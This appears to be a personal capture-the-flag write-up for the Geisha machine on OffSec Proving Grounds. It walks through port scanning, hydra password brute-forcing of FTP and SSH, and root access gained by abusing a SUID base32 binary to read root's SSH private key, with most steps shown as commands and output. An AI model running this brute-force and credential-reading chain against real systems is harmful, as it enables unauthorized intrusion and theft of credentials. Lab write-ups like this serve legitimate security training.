Geisha
This is my write ups for Geisha (See original submission) on Off-Sec Proving Ground.
This room is a CTF type of room
I will try to go deep into the technical thing we do in this room.
1. Enum
- Lets start up the box and get the IP
- Export the IP to the terminal so we can use it easier
export IP=192.168.197.82
## Test to see if the IP is correct
echo $IP
- Start the port scan
Port Scan
## Create a directory to store the scan results
mkdir nmap
## Start a default nmap scan
nmap -sC -sV -vvv -oN nmap/default_scan $IP
## Start a rustscan for faster all port scan
rustscan -a $IP -- -oN nmap/rustscan $IP
Rustscan result
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
80/tcp open http syn-ack
7080/tcp open empowerid syn-ack
7125/tcp open unknown syn-ack
8088/tcp open radan-http syn-ack
9198/tcp open unknown syn-ack
2. Foothold
- Try login as
anonymousonftpbut fail
ftp -p $IP
Connected to 192.168.197.82.
220 (vsFTPd 3.0.3)
Name (192.168.197.82:minhnq): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> exit
221 Goodbye.
- We can try to brute force the
ftppassword, since this machine calledgeishai would assume that one of the user should begeisha
FTP Brute Force
hydra -l geisha -P /usr/share/wordlists/rockyou.txt -t 32 $IP ftp
## Result
[21][ftp] host: 192.168.197.82 login: geisha password: letmein
- We can now login the
ftpas usergeisha
ftp -p $IP
Connected to 192.168.197.82.
220 (vsFTPd 3.0.3)
Name (192.168.197.82:minhnq): geisha
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (192,168,197,82,213,164).
150 Here comes the directory listing.
drwxr-xr-x 2 1000 1000 4096 Aug 20 2020 .
drwxr-xr-x 3 0 0 4096 May 03 2020 ..
-rw-r--r-- 1 1000 1000 220 May 03 2020 .bash_logout
-rw-r--r-- 1 1000 1000 3526 May 03 2020 .bashrc
-rw-r--r-- 1 1000 1000 807 May 03 2020 .profile
-rw-r--r-- 1 1000 1000 33 Dec 05 22:06 local.txt
226 Directory send OK.
ftp> pwd
257 "/home/geisha" is the current directory
- Since we can brute force
ftpservice, i wonder if we can also brute force thessh? lets try
hydra -l geisha -P /usr/share/wordlists/rockyou.txt -t 32 $IP ssh
## Result
[22][ssh] host: 192.168.197.82 login: geisha password: letmein
- Look like the user
geishahas the same password forsshas forftp
sshpass -p letmein ssh geisha@$IP
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
geisha@geisha:~$
3. PrivEsc
- Looking for all the files with
sticky bits
find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/base32
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount
- With
base32we can use to read other files that we are not suppose to be able to read.
Get the root user id_rsa
base32 /root/.ssh/id_rsa | base32 -d
-----BEGIN RSA PRIVATE KEY-----
[REDACTED]
-----END RSA PRIVATE KEY-----
- Then we can use the
id_rsato login asrootuser of the machine
ssh -i id_rsa_root root@$IP
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@geisha:~#
Correct permission
Remember to give the file id_rsa correct permission of 600
Getting the flags
cat /root/proof.txt /home/geisha/local.txt
[REDACTED]
[REDACTED]